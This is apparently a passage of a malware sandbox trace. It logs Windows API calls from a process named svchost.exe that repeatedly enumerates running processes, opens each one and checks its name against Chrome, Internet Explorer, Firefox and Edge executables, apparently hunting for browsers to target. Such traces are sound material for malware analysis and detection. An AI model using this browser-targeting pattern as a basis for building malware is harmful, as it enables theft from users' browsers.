	[0224.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.571] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.571] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.571] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5ad4
	[0224.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.573] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.573] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.573] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.574] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.574] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5ad8
	[0224.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.575] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.575] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.575] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.576] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5adc
	[0224.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.578] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.578] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0224.579] CloseHandle (hObject=0x4fd0) returned 1
	[0224.579] Sleep (dwMilliseconds=0x64) 
	[0224.688] GetCurrentProcessId () returned 0x110
	[0224.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0224.692] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0224.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0224.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0224.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5ae0
	[0224.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.696] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.696] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.697] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.697] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5ae4
	[0224.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.699] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.700] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.700] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.701] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0224.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5ae8
	[0224.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.702] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0224.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.702] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.703] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0224.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.704] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.704] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5aec
	[0224.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.705] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.706] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.706] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.706] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0224.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5af0
	[0224.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.707] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0224.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.708] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.708] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0224.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.708] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0224.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5af4
	[0224.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.710] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0224.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.710] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.710] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0224.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.711] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0224.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5af8
	[0224.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.712] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0224.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.712] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.712] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0224.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.713] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0224.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5afc
	[0224.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.714] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.714] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.714] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.714] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5b00
	[0224.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.716] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.716] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.717] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5b04
	[0224.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.718] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.719] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5b08
	[0224.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.721] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.721] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5b0c
	[0224.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.722] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.723] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.723] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.724] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5b10
	[0224.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.725] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.725] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.725] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.726] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5b14
	[0224.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.727] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.727] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.727] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.728] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5b18
	[0224.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.729] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.729] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.729] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.730] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.730] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0224.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b1c
	[0224.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.731] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0224.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.731] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.732] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0224.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.732] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5b20
	[0224.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.733] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.733] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.734] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.735] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.735] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0224.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5b24
	[0224.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.736] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.736] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.737] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.737] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5b28
	[0224.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.739] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.739] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.740] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5b2c
	[0224.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.741] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.741] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.742] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.742] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
